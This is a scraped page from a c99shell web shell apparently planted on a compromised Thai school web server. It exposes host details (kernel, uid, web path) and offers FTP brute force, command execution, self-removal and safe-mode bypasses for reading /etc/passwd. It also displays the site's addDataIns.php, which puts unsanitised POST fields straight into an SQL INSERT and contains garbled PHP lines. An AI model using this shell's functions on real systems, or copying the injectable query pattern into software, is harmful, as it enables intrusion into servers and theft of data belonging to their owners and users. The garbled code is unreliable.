!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addDataIns.php (2.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<meta charset='tis-620'>
<?php

include_once("classes/Crud.php");
$crud = new Crud();
$round=$_POST['round']; 
$strDate explode("/"$_POST['proDate']);
$proDate=($strDate[2]-543)."-".$strDate[1]."-".$strDate[0]." ".date("H:i:s");
$term=$_POST['term'];
$academic_year=$_POST['academic_year'];
$name=$_POST['name'];
$amountj=$_POST['amountj'];
$amountnj=$_POST['amountnj'];
$reason=$_POST['reason']; 

$per1=$_POST['per1'];
$per2=$_POST['per2'];
$per3=$_POST['per3'];
$per4=$_POST['per4'];
$per5=$_POST['per5'];
$per6=$_POST['per6'];
$per7=$_POST['per7'];
$per8=$_POST['per8'];
$per9=$_POST['per9'];
$per10=$_POST['per10'];
$per11=$_POST['per11'];
$per12=$_POST['per12'];
$per13=$_POST['per13'];
$per14=$_POST['per14'];
$per15=$_POST['per15'];
$per16=$_POST['per16'];
$per17=$_POST['per17'];
$per18=$_POST['per18'];
$per19=$_POST['per19'];
$per20=$_POST['per20'];


$s1=$_POST['s1'];
$s2=$_POST['s2'];
$s3=$_POST['s3'];
$s4=$_POST['s4'];
$s5=$_POST['s5'];
$s6=$_POST['s6'];
$s7=$_POST['s7'];
$s8=$_POST['s8'];
$s9=$_POST['s9'];
$s10=$_POST['s10'];
$s11=$_POST['s11'];
$other=$_POST['other'];
$result=$_POST['result'];
$problem=$_POST['problem'];
$ploblemDetail=$_POST['ploblemDetail'];
$probManage=$_POST['probManage'];
$probSend=$_POST['probSend'];
$userID=$_POST['userID'];

$result $crud->execute("INSERT INTO consulting(id,proDate,term,academic_year,round,amountj,amountnj,per1,per2,per3,per4,per5,per6,per7,per8,per9,per10,per11,per12,per13,per14,per15,per16,per17,per18,per19,per20,reason,s1,s2,s3,s4,s5,s6,s7,s8,s9,s10,s11,other,result,problem,ploblemDetail,probManage,probSend,nameTeacher,userID) VALUES('','$proDate','$term','$academic_year','$round','$amountj','$amountnj','$per1','$per2','$per3','$per4','$per5','$per6','$per7','$per8','$per9','$per10','$per11','$per12','$per13','$per14','$per15','$per16','$per17','$per18','$per19','$per20','$reason','$s1','$s2','$s3','$s4','$s5','$s6','$s7','$s8','$s9','$s10','$s11','$other','$result','$problem','$ploblemDetail','$probManage','$probSend','$name','$userID')"); 
?>
<div align="center">
    <img src="img/T1.png">
</div> 

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0123 ]--